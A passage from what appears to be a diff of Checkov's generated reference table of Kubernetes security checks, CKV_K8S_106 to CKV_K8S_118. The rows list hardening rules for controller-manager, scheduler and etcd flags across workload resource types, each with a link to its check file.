[KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3468 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3469 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3470 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3471 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3472 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3473 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | 
[KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3474 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3475 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3476 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3477 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3478 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3479 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3480 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | 
[KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3481 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3482 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3483 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3484 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3485 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3486 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | 
[KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3487 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3488 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3489 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3490 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3491 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3492 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | 
[KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3493 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3494 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3495 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3496 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3497 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3498 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file 
argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3499 | CKV_K8S_110 | resource | Pod | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3500 | CKV_K8S_110 | resource | PodTemplate | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3501 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3502 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3503 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3504 | CKV_K8S_111 
| resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3505 | CKV_K8S_111 | resource | DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3506 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3507 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3508 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3509 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3510 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3511 | 
CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3512 | CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3513 | CKV_K8S_111 | resource | StatefulSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3514 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3515 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3516 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3517 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | 
[RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3518 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3519 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3520 | CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3521 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3522 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3523 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3524 | CKV_K8S_113 | resource | CronJob | Ensure that the 
--bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3525 | CKV_K8S_113 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3526 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3527 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3528 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3529 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3530 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3531 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 
127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3532 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3533 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3534 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3535 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3536 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3537 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3538 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | 
[SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3539 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3540 | CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3541 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3542 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3543 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3544 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3545 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3546 | CKV_K8S_115 | resource | Deployment | Ensure that 
the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3547 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3548 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3549 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3550 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3551 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3552 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3553 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | 
[SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3554 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3555 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3556 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3557 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3558 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3559 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3560 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | 
[EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3561 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3562 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3563 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3564 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3565 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3566 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3567 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3568 
| CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3569 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3570 | CKV_K8S_117 | resource | PodTemplate | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3571 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3572 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3573 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3574 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3575 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | 
